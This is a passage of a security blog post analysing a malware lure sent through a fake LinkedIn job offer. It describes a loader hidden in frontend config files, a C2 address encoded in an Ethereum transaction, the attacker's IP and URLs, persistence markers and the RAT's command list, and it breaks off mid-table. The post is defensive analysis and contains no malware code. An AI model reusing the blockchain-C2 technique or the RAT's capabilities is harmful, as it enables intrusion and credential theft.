{"id":7138,"date":"2026-08-06T13:52:10","date_gmt":"2026-08-06T11:52:10","guid":{"rendered":"https:\/\/www.digitalnisebeobrana.cz\/?p=7138"},"modified":"2026-08-07T09:06:18","modified_gmt":"2026-08-07T07:06:18","slug":"i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain","status":"publish","type":"post","link":"https:\/\/www.digitalnisebeobrana.cz\/en\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/","title":{"rendered":"I ran malware on purpose. It found its server address in the blockchain"},"content":{"rendered":"<p>Malicious code usually has to reach the attacker&#8217;s server somehow. That address is therefore one of the first things anyone pulls out of a sample, because it is something you can act on: block it at the firewall, report it to the hosting provider, warn everyone else about it.<\/p>\n<p>This one carried no address at all. On execution it asks the public Ethereum network about one specific transaction and unpacks the address out of it. That transaction is public and you can <a href=\"https:\/\/etherscan.io\/tx\/0x1ee850dfe646976e3783dcd1db11282316234cf46efc62b218557e9bef2670a3\">open it in a blockchain explorer<\/a>. The server address is written straight into the recipient of that transaction, just in hexadecimal. If you want to work it out yourself, the exact breakdown and a five-line script are in the technical section at the end.<\/p>\n<p>It is worth noticing where exactly that information sits. Not in the transaction data. The transaction itself carries no message. That recipient address belongs to nobody: it is not a wallet and not a smart contract, it is simply a number someone made up so that it works out to an IP address and two ports. The message is not in what was sent. The message is in who it was sent to.<\/p>\n<p>It is like a public listing with a street address in it. The address looks exactly like any other, nothing about it seems odd, and it passes unnoticed. Except the house number is actually a safe combination, and only the intended reader knows that.<\/p>\n<p>So there is nothing in the code the victim receives that you could block. It contains only a pointer to infrastructure nobody is going to switch off. And even if someone did manage to take that server down, the attacker sends another transaction to a differently assembled address and every deployed copy redirects itself to it.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"This_malware_reached_me_in_a_job_offer_on_LinkedIn\"><\/span>This malware reached me in a job offer on LinkedIn<a href=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_first_contact.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-7149\" src=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_first_contact-289x300.png\" alt=\"\" width=\"289\" height=\"300\" srcset=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_first_contact-289x300.png 289w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_first_contact-500x520.png 500w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_first_contact.png 528w\" sizes=\"auto, (max-width: 289px) 100vw, 289px\" \/><\/a><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At the end of July, a man calling himself Aaron Clark messaged me. Verified profile, 500+ connections, one mutual contact, a decently written message. He was offering collaboration on an AI-powered crypto tracker. The project was supposedly already funded, with five million dollars set aside for development, and a token launch on the way. Part-time or full-time, whatever suited me.<br \/>\nI do not talk to headhunters very often, so I cannot say whether anything about it was out of the ordinary. At first glance nothing seemed off.<br \/>\nAt second glance it did.<\/p>\n<p>He described himself as a member of Block&#8217;s board of directors.<\/p>\n<p>That is the sentence that made me open his profile properly.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Who_is_actually_writing_to_me\"><\/span>Who is actually writing to me<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Block is a publicly traded company. You do not have to guess who sits on the board of a company like that. They are public. Block lists them on its investor relations pages, and as an issuer it has to list them in its SEC filings too. You open the <a href=\"https:\/\/investors.block.xyz\/governance\/board-of-directors\/\">list<\/a> and read the names. Jack Dorsey is on it, co-founder of Block and of Twitter. Jim McKelvey, the other co-founder. Shawn Carter, better known to most people as Jay-Z, since May 2021. And alongside them, people from Sequoia Capital, Goldman Sachs and MIT.<\/p>\n<p>Aaron Clark is not.<\/p>\n<p>That took two minutes and would have settled the matter on its own. The rest of the profile only filled in the same picture.<\/p>\n<p><strong>A career that does not add up.<\/strong> According to the profile he was a project manager at a small company from 2019 to 2021, then self-employed for two years, then CTO of a small AI startup for two years, and from 2024 a board member of one of the largest fintech companies in the world. I have no first-hand experience of that world, but I suspect people reach the board of a company that size by a slightly different route.<\/p>\n<p><strong>Zero activity.<\/strong> Over a thousand followers, not a single post. Ever. Someone with that position and that reach who has not written one sentence in two years.<\/p>\n<p><strong>A role that does not fit.<\/strong> A board member of a major fintech company sourcing a freelance frontend developer on LinkedIn, at an hourly rate, for an unrelated AI crypto project. That does not happen.<\/p>\n<p><strong><a href=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-7150\" src=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-133x300.png\" alt=\"\" width=\"133\" height=\"300\" srcset=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-133x300.png 133w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-456x1024.png 456w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-768x1726.png 768w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-683x1536.png 683w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-500x1124.png 500w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile-800x1798.png 800w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_profile.png 861w\" sizes=\"auto, (max-width: 133px) 100vw, 133px\" \/><\/a>A verified profile.<\/strong> The blue badge next to a name does not mean the contents of the profile are true. It means the account passed some verification, typically of identity or a work email address. It says nothing about a claim of board membership. That distinction is exactly what most people skip over, which is why the badge works.<\/p>\n<p>Fun fact: in the right-hand column, next to that profile, LinkedIn was serving me a paid ad for open positions at Block. The platform treats the name match as a reason to sell advertising rather than a reason to verify anything. And in doing so it lends the scammer credibility.<br \/>\nThanks, LinkedIn!<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Delete_it_and_report_it_Or_maybe_not\"><\/span>Delete it and report it. Or maybe not?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At this point it was clear this was a scam. But I wanted to know which kind.<\/p>\n<p>Fake job offers end in several different ways. Sometimes it is a straightforward advance-fee scam. Sometimes it is harvesting personal data. And sometimes the entire story is just wrapping for getting malicious code onto the victim&#8217;s machine.<\/p>\n<p>I was interested in the whole path, not in the fact that someone was lying about their employer. Replying and letting them walk me through their process cost me nothing.<\/p>\n<p>I asked the ordinary questions. What stage the project was at, what the existing team looked like, which areas they needed help with, whether this was consulting, infrastructure and security, product development or a longer-term role.<\/p>\n<p>Most of them were never answered.<\/p>\n<p>On Friday a project overview PDF arrived. On Monday I wrote back that out of that very broad scope, my experience was closest to infrastructure, security, backend architecture and deployment, and asked again what specifically they wanted from me at this stage, whether they had a team and an existing codebase, and what the next step would be.<\/p>\n<p>This came back:<\/p>\n<blockquote><p>Okay,<br \/>\nThat is what we want from you. This project&#8217;s normal hourly rate is around $100.<\/p><\/blockquote>\n<p>The first line answers nothing. The rest of the message went on to say the frontend was already built, that I should review it, and that <strong>only then<\/strong> would we schedule a technical meeting about timeline and milestones. And to send my GitHub username.<\/p>\n<p>So I created a separate GitHub account, filled it with AI-generated content to make it look more credible (yes, really) and sent it over on Tuesday morning. The private repository invitation arrived six minutes later.<\/p>\n<p>The following afternoon, a follow-up:<\/p>\n<blockquote><p>Did you get any chance to run and see the project?<\/p><\/blockquote>\n<p>That is the most revealing sentence in the whole conversation. In all that time, nobody asked me a single technical question. Not what I thought of the architecture, not what I would change about the frontend. The only thing they cared about was whether I had <strong>run<\/strong> it.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_was_in_the_repository\"><\/span><a href=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_pdf.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-7151\" src=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_pdf-289x300.png\" alt=\"\" width=\"289\" height=\"300\" srcset=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_pdf-289x300.png 289w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_pdf-500x520.png 500w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_pdf.png 528w\" sizes=\"auto, (max-width: 289px) 100vw, 289px\" \/><\/a>What was in the repository<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The project overview PDF came first. I checked whether it contained any active content. It did not. No JavaScript, no embedded files, no forms. The PDF was not carrying anything; its job was to look like material from a real company and send the reader on to the repository. It did that job well. During a quick check it is easy to honestly verify a document, conclude that it is clean, and then let that feeling spill over onto everything else that came with it.<\/p>\n<p>The repository reported 6,273 commits. The name and photo of the last commit&#8217;s author at the top, a complete frontend structure below. At first glance, a project someone had worked on for months.<\/p>\n<p>That history was stolen. It belonged to a legitimate open source project, and the attacker placed a single commit on top of it, message &#8220;Refactoring codebse for speed&#8221;, which deleted over four thousand files and replaced them with a hundred of its own. Only the history was left. Consistent with that, every file in the repository carries the same last-modified date.<\/p>\n<p>That has an unpleasant side effect. GitHub matches a commit author by email address, and the address in that commit belongs to a real developer of the original project. So the repository page displays the account and photo of an existing person who has nothing to do with any of this. That is why I am not naming him here.<\/p>\n<p>It is worth being clear about whose problem this actually is. Git, by design, does not verify the author of a commit at all. The name and email are written in by whoever commits, and they can put anything there. It has worked that way from the start, and it follows from Git being decentralised and usable with no server connection.<\/p>\n<p>What GitHub adds is the presentation. It matches the commit to an account by email, shows a photo and a link to a profile, and by default an unsigned commit gets no marking whatsoever. A forged commit therefore looks exactly like a genuine one. GitHub also explicitly excludes Git email spoofing from its bug bounty, on the grounds that on its own it grants an attacker neither repository access nor any additional privileges. Technically that holds. In practice it means someone else&#8217;s name and photo can be used as credibility for free, which is exactly what happened here.<\/p>\n<p>There are defences, but they are opt-in and you have to turn them on in advance. GitHub lets you hide your own email and commit under an address of the form <code>username@users.noreply.github.com<\/code>. That address stays tied to your account, so your commits are still attributed to you normally; nobody just knows an address they could reuse. The second option is signing commits with a key and enabling what GitHub calls vigilant mode, after which any unsigned commit bearing your name is displayed as unverified.<\/p>\n<p><a href=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_offer.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-7152\" src=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_offer-300x246.png\" alt=\"\" width=\"300\" height=\"246\" srcset=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_offer-300x246.png 300w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_offer-500x411.png 500w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/aaron_mess_offer.png 510w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>The catch is that this only protects the person who set it up. It would have helped the developer whose name appeared in that forged commit only if he had enabled vigilant mode himself.<\/p>\n<p>The rest of the page was less convincing. Zero stars, zero watchers, zero forks, no contributors, no description. And a <code>.env<\/code> file committed at the root. Don&#8217;t do that \ud83d\ude42<\/p>\n<h2><span class=\"ez-toc-section\" id=\"READMEai\"><\/span>README.ai<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The README in the repository is a generic template. A welcome line, &#8220;How can I run this code?&#8221;, a link to installing Node.js through nvm, four steps and a list of technologies used: Vite, TypeScript, React, shadcn-ui, Tailwind CSS.<\/p>\n<p>That text was not written for this project. It matches the template automatically generated by the AI app builder Lovable, down to the identical wording of the steps and the same list of technologies. The attacker stripped out the references to Lovable itself and the Codespaces section, and left the rest alone.<\/p>\n<p>In practice this means nobody wrote the bait. Someone had a plausible-looking crypto dashboard generated in a few minutes, mounted it on someone else&#8217;s history and sent it out. The cost of producing the wrapper is now effectively zero, which is why offers like this can be sent out in any quantity you like.<\/p>\n<p>And then there is the last line of those instructions:<\/p>\n<pre><code># Step 4: Start the development server with auto-reloading and an instant preview.\r\nnpm run dev<\/code><\/pre>\n<p><a href=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-7153\" src=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-251x300.png\" alt=\"\" width=\"251\" height=\"300\" srcset=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-251x300.png 251w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-855x1024.png 855w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-768x920.png 768w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-1283x1536.png 1283w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-500x599.png 500w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-800x958.png 800w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github-1280x1533.png 1280w, https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/github.png 1657w\" sizes=\"auto, (max-width: 251px) 100vw, 251px\" \/><\/a><br \/>\nThat command sets off the rest of this story. It never had to be hidden anywhere, because the project itself presents it as the ordinary, expected step. Anyone who wanted to look at that frontend ran it.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_happened_when_I_ran_it\"><\/span>What happened when I ran it<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I did not, of course, run it on my own machine. I built an isolated sandbox for it: a disposable system with not a single real password, key or wallet on it, cut off from the internet and from the host, behind a gateway of my own that recorded all traffic and let nothing out that I had not permitted in advance. I pointed the attacker&#8217;s server at myself, so the malware asked me for everything instead of him. When it finally asked for its main component, I sent it an empty response. It never got to download that last part, and it never ran. That way I could watch the whole sequence without leaving anyone&#8217;s program running on a real machine.<\/p>\n<p>Then I typed what they had asked for.<\/p>\n<pre><code>npm run dev<\/code><\/pre>\n<p>On the surface, nothing unusual happened. The dev server came up, no errors on the output, the dashboard would have opened in a browser a moment later. If I had been sitting there as a candidate for a job or a contract, I would have been browsing the UI and noticed nothing.<\/p>\n<p>Meanwhile this happened. The project connected to a public Ethereum node, one of those services people routinely use to read data off the blockchain, and read a single transaction from it. That transaction held the server address, which it unpacked. It reached that server, downloaded another piece of program from it, ran that, and the new piece asked for the last, main part.<\/p>\n<p>Under three tenths of a second passed between the command and that point.<br \/>\nNot even an Italian gets through an espresso that fast.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_it_was_and_what_it_would_have_done\"><\/span>What it was and what it would have done<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I downloaded that last piece and took it apart without running it. It is a rat. Or rather a RAT, an abbreviation that expands two different ways: remote administration tool, when it is a legitimate program for managing machines remotely, and remote access trojan, when it is the same thing without the owner&#8217;s knowledge. The difference is not in the code. It is in whether the owner of the machine knows about it.<\/p>\n<p>This one was hidden in a frontend configuration file, so the second. It is a program that lets an attacker operate someone else&#8217;s computer remotely, as if they were sitting at it.<\/p>\n<p>This particular one can:<\/p>\n<ul>\n<li>read the contents of the clipboard<\/li>\n<li>run any command its owner could run on that machine<\/li>\n<li>run any further program the attacker sends it<\/li>\n<li>take any file or an entire directory including subdirectories and upload it to its own server.<\/li>\n<\/ul>\n<p>The last one is what matters. This is not a program with a fixed target list that you could dodge by storing your wallet somewhere else. It is remote access. The attacker connects, looks around, and decides on the spot what interests him.<\/p>\n<p>In practice it means he can take anything reachable by the account that started the project. Server access keys, Git and cloud logins, configuration files with passwords, saved browser credentials, wallet files, password manager data, source code, documents. And the clipboard, which is incidentally the moment it pays off that people occasionally copy a seed phrase or a password.<\/p>\n<p>On an ordinary developer laptop there is usually plenty of that material.<\/p>\n<p>All of that, though, it does on command. There is one more thing it does entirely on its own the moment it starts, and that is the most important finding in the whole analysis.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Deleting_the_repository_is_not_enough\"><\/span>Deleting the repository is not enough<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>About a second after starting, the program looks for installed developer applications and inserts itself into them. Into VS Code, Cursor, Antigravity, Discord, GitHub Desktop and npm.<\/p>\n<p>It writes straight into their files, indented by roughly two hundred spaces, so if someone opens that file in an editor the code sits far past the right edge of the screen and will not be seen during ordinary browsing.<\/p>\n<p>The consequence: someone runs a project like this, decides shortly afterwards that it was a stupid idea, deletes the repository and goes to bed. And the infection stays. It sits in the editor and in npm and runs again the next time they are used normally.<\/p>\n<p>Deleting the project folder does not solve this.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Where_my_evidence_ends\"><\/span>Where my evidence ends<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Everything above I either observed at runtime or read directly in the program&#8217;s own code. That the repository contains hidden malicious code, that <code>npm run dev<\/code> executes it, that it finds the attacker&#8217;s server through the blockchain, downloads and runs further code from there, and that this last piece is a remote access tool that settles into developer applications on its own.<\/p>\n<p>What I did not see: an actual attacker at work. My test system contained no real data, so nothing was ever stolen, and I have no idea whether anyone ever issued commands during a real infection. I also do not have the second, parallel branch of the chain. The server stopped answering before I could fetch it.<\/p>\n<p>So no, I cannot write that they drained my wallet. I can write that they could have.<\/p>\n<p>The approach, the whole structure of the chain and the markers used all match what is publicly described under the names Contagious Interview and DEV#POPPER. None of this is new. It just works well.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_to_do_if_you_ran_something_like_this\"><\/span>What to do if you ran something like this<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Take the machine off the network so the attacker cannot connect to it.<\/p>\n<p>Then search the files of your installed developer applications and npm for the markers <code>\/*RS260605*\/<\/code> and <code>\/*C260521A*\/<\/code>. Exact paths and older marker variants are in the technical section below. Grep finds them reliably; your eyes will not, because they sit far past the right margin.<\/p>\n<p>If you find them, you know. If you do not find them, you do not know. This sample is one specific version of one specific campaign, and the next one may well look different. So for a machine holding real credentials, the only reliable answer is a clean reinstall. Cleaning by indicators is good for understanding what happened, not for feeling safe afterwards.<\/p>\n<p>And then the part people put off most: treat everything that account could reach as compromised. Keys, tokens, API keys, the contents of configuration files, credentials stored in the browser. Rotate them, do not hope. If you had a cryptocurrency wallet on that machine, move the funds from a new clean device, using a seed generated on that device, not on the affected one.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_to_take_away\"><\/span>What to take away<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ol>\n<li>A claim about a position at a large company is almost always checkable. The boards of public companies are published and the check takes two minutes.<\/li>\n<li>If you cannot be bothered to search, drop the whole offer and the profile into any AI tool with web access and have it look them over. It is not bulletproof and it should not be your only filter, but contradictions like &#8220;claims a position no public source confirms&#8221; turn up in seconds.<\/li>\n<li>A verified LinkedIn profile does not verify what the profile says.<\/li>\n<li>When the other side never answers substantive questions about team and scope, but answers instantly on anything that moves things toward running code, that is a signal in itself.<\/li>\n<li>A private repository invitation is not evidence of legitimacy.<\/li>\n<li>A long, credible Git history can be copied from someone else&#8217;s project. A commit count proves nothing.<\/li>\n<li>A convincing-looking frontend is now a few minutes of work in an AI builder. How a project looks says nothing about who is behind it.<\/li>\n<li>A repository can be malicious with no install scripts in it at all. Configuration files for frontend tools are executable code.<\/li>\n<li>Remote access is more general than a target list. Moving your wallet elsewhere does not protect you.<\/li>\n<li>Deleting the cloned repository may not remove what has meanwhile been written into your editor and into npm.<\/li>\n<li>Foreign code runs in a disposable environment with no access to your own data and no open internet. A VM snapshot is not a security boundary.<\/li>\n<li>A tempting offer, pressure to move fast and a task that amounts to &#8220;just run it&#8221; are not a coincidence together. It is a pattern that repeats.<\/li>\n<\/ol>\n<p>The last point has nothing to do with technology. This exact type of offer reaches developers with a public profile, visible repositories and an interest in cryptocurrency. The attacker does not pick the target at random. The attacker picks it out of publicly available information.<\/p>\n<hr \/>\n<h2><span class=\"ez-toc-section\" id=\"Technical_analysis\"><\/span>Technical analysis<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>From here on, this is for anyone interested in exactly how it works, or who needs to check their own machine. The story above should make sense without this part.<\/p>\n<p>A note on method. I cut the work of unpacking the obfuscated code down considerably by using AI. My goal was not to reverse someone else&#8217;s JavaScript from scratch, but to map the whole process this group uses, from the first LinkedIn contact through to persistence. Every concrete value below, the hashes, paths and commands, I verified against the sample afterwards.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Lab\"><\/span>Lab<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The controlled execution of the sample did not happen on a working machine or in a snapshot of a production system. A snapshot is a rollback tool, not a security boundary.<\/p>\n<pre><code>Arch Linux host\r\n\u251c\u2500\u2500 REMnux VM: gateway, interception, packet capture, C2 replay\r\n\u2514\u2500\u2500 Debian 13 VM: disposable victim<\/code><\/pre>\n<p>REMnux acted as the victim&#8217;s gateway, locally held the real C2 IP address, served the captured malware stages, filtered outbound traffic and recorded packets. Traffic to the known C2 therefore never left the lab.<\/p>\n<p>The victim ran as an unprivileged user with no <code>sudo<\/code>. During the malware run there were no shared folders in the VM, no GitHub token, no SSH agent forwarding, no USB, and shared clipboard and drag and drop were both disabled. Outbound traffic was permitted only on TCP 443 toward the current IP addresses of the allowed Ethereum RPC services, and everything else was dropped. Before running the sample I verified that ordinary internet access from the victim failed.<\/p>\n<p>I installed dependencies with <code>npm install --ignore-scripts<\/code>. Not because that is sufficient, but to separate what executes during install from what executes during the dev command.<\/p>\n<p>I had already fetched the real <code>\/init<\/code> and <code>\/0\/body<\/code> responses separately beforehand, without executing them. So I knew something like that was waiting at the end of the chain, and how large it was. I wanted the loader and both follow-on stages to run normally and leave traces in the process table and in the traffic, while the last link never fired. The gateway therefore returned the responses to those two requests empty:<\/p>\n<pre><code>\/init    \u2192 {\"_B\":\"\"}\r\n\/0\/body  \u2192 empty response<\/code><\/pre>\n<p>The loader and both follow-on stages ran as a result and left traces behind. The final payload did not run. The real <code>\/init<\/code> response I had captured earlier as inert data and analysed statically, without executing it.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Where_the_malicious_code_was\"><\/span>Where the malicious code was<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><code>package.json<\/code> was clean. No <code>preinstall<\/code>, <code>install<\/code>, <code>postinstall<\/code> or <code>prepare<\/code>. Only the usual <code>dev<\/code>, <code>build<\/code>, <code>lint<\/code> and <code>preview<\/code>.<\/p>\n<p>So the common advice to install with <code>--ignore-scripts<\/code> would not have helped here. The malware did not need the install step.<\/p>\n<p>The same obfuscated loader was appended to the end of two configuration files:<\/p>\n<pre><code>vite.config.ts\r\npostcss.config.js<\/code><\/pre>\n<p>The loader was 5,131 bytes, SHA-256:<\/p>\n<pre><code>ed6c0476c62bc21c981b95861677bf14eeeaba57ac071c860d0e599ecbf6156c<\/code><\/pre>\n<p>Duplicating it across two files means the chain fires whether the developer reaches for the dev server or for the build.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"C2_stored_on_Ethereum\"><\/span>C2 stored on Ethereum<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The loader queried public Ethereum JSON-RPC endpoints: <code>eth.drpc.org<\/code> and <code>eth-mainnet.public.blastapi.io<\/code> (plus one clearly unusable, <code>ethereum-rpc.publicnode.com1<\/code>).<\/p>\n<p>It looked for activity associated with the marker <code>33ff3edaf55a8e03dcbc7cb40d498a49<\/code>. The specific transaction:<\/p>\n<pre><code>Block:     25688067\r\nTx:        0x1ee850dfe646976e3783dcd1db11282316234cf46efc62b218557e9bef2670a3\r\nSender:    0x33ff3edaf55a8e03dcbc7cb40d498a49cd499891\r\nRecipient: 0x171b14bb01bb171b14bb0050eb7f39c35c47e682<\/code><\/pre>\n<p>The carrier of the information is not the transaction&#8217;s input field but the recipient address:<\/p>\n<pre><code>0x 171b14bb 01bb 171b14bb 0050 eb7f39c35c47e682\r\n   |        |    |        |    |\r\n   |        |    |        |    padding, to reach 20 bytes\r\n   |        |    |        port 80\r\n   |        |    23.27.20.187\r\n   |        port 443\r\n   23.27.20.187<\/code><\/pre>\n<p>No cryptography, just numbers written in hexadecimal. If you would rather not do the arithmetic by hand, copy this into a file and run it with Python. It downloads nothing, connects to nothing and touches no files:<\/p>\n<pre><code>address = \"0x171b14bb01bb171b14bb0050eb7f39c35c47e682\"\r\n\r\nb = bytes.fromhex(address.replace(\"0x\", \"\"))\r\nfor i in (0, 6):\r\n    ip = \".\".join(str(x) for x in b[i:i + 4])\r\n    port = b[i + 4] * 256 + b[i + 5]\r\n    print(\"http:\/\/\" + ip + \":\" + str(port))<\/code><\/pre>\n<p>Rotating infrastructure therefore means nothing more than sending another transaction to a differently assembled address.<\/p>\n<p>The decoded result:<\/p>\n<pre><code>http:\/\/23.27.20.187:443\/boot\r\nhttp:\/\/23.27.20.187:80\/0\/boot<\/code><\/pre>\n<p>Although one of the ports is 443, the communication was unencrypted plain HTTP. Port 443 does not guarantee TLS. It guarantees port 443.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Exact_execution_sequence\"><\/span>Exact execution sequence<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The process started normally: <code>bash<\/code> \u2192 <code>npm run dev<\/code> \u2192 Vite \u2192 esbuild. In parallel:<\/p>\n<ol>\n<li>a connection to Ethereum RPC and derivation of the C2 address;<\/li>\n<li>connections to <code>23.27.20.187<\/code> on ports 443 and 80;<\/li>\n<li>download of two distinct obfuscated JavaScript stages;<\/li>\n<li>execution through <code>node -e<\/code> in separate processes;<\/li>\n<li>requests for the final payloads from <code>\/init<\/code> and <code>\/0\/body<\/code>.<\/li>\n<\/ol>\n<p>The whole chain from start to the final-payload request took under three tenths of a second. Requests carried a marker identifying the victim:<\/p>\n<pre><code>X: 33ff3edaf55a8e03dcbc7cb40d498a49:*8-0<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"Final_payload_analysis\"><\/span>Final payload analysis<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The captured <code>\/init<\/code> response is 166,703 bytes and has four fields. <code>_U<\/code> is the server base address, <code>_H<\/code> is a copy of the first stage, <code>_B<\/code> is the main payload and <code>_Z<\/code> is the body used for persistence.<\/p>\n<p>The main payload was packed into a <code>Function<\/code> constructor with a single generated body of 73,649 characters. Searching it for keywords finds nothing. I unpacked it by evaluating only the string decoder in an isolated context and leaving the operational part alone. That exposed 343 indexed strings and with them the entire command and persistence logic.<\/p>\n<p>It is a cross-platform Node.js RAT. Version:<\/p>\n<pre><code>260804<\/code><\/pre>\n<p>Those digits look like a date in YYMMDD format, meaning 4 August 2026, the day before I ran the sample. The markers used for persistence follow the same pattern (<code>RS260605<\/code>, <code>C260521A<\/code>), as do older variants from 2025. This is an observation rather than a confirmed fact, but it is consistent.<\/p>\n<p>On connection it identifies itself to the server, sending a session ID, process ID, OS type, version, campaign label and first and current visit timestamps. The command channel runs over Socket.IO to <code>http:\/\/23.27.20.187:443<\/code>, again unencrypted, retrying every five seconds.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Command_list\"><\/span>Command list<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<table>\n<thead>\n<tr>\n<th>Command<\/th>\n<th>What it does<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>ss_info<\/code><\/td>\n<td>returns version, session ID, OS details, C2 addresses, Node paths, the path it was started from, and timestamps<\/td>\n<\/tr>\n<tr>\n<td><code>ss_ip<\/code><\/td>\n<td>looks up the victim&#8217;s public IP through <code>ip-api.com<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>ss_cb<\/code><\/td>\n<td>reads and sends the clipboard<\/td>\n<\/tr>\n<tr>\n<td><code>ss_upf:&lt;file&gt;,&lt;destination&gt;<\/code><\/td>\n<td>uploads one selected file<\/td>\n<\/tr>\n<tr>\n<td><code>ss_upd:&lt;directory&gt;,&lt;destination&gt;<\/code><\/td>\n<td>recursively walks a directory and uploads every file in it<\/td>\n<\/tr>\n<tr>\n<td><code>ss_dir<\/code>, <code>ss_fcd:&lt;path&gt;<\/code> and <code>cd<\/code><\/td>\n<td>working directory control<\/td>\n<\/tr>\n<tr>\n<td><code>ss_stop<\/code><\/td>\n<td>stops an upload in progress<\/td>\n<\/tr>\n<tr>\n<td><code>ss_inz:&lt;path&gt;<\/code><\/td>\n<td>injects the persistent code into a selected file<\/td>\n<\/tr>\n<tr>\n<td><code>ss_inzx:&lt;path&gt;<\/code><\/td>\n<td>removes it from a selected file<\/td>\n<\/tr>\n<tr>\n<td><code>ss_connect:&lt;host&gt;<\/code><\/td>\n<td>switches to another operator-supplied server<\/td>\n<\/tr>\n<tr>\n<td><code>ss_eval:&lt;code&gt;<\/code><\/td>\n<td>executes arbitrary JavaScript<\/td>\n<\/tr>\n<tr>\n<td><code>ss_eval64:&lt;base64&gt;<\/code><\/td>\n<td>the same, encoded<\/td>\n<\/tr>\n<tr>\n<td><code>ss_exit<\/code> and <code>ss_exit_f<\/code><\/td>\n<td>terminates the process<\/td>\n<\/tr>\n<tr>\n<td>anything else<\/td>\n<td>runs as 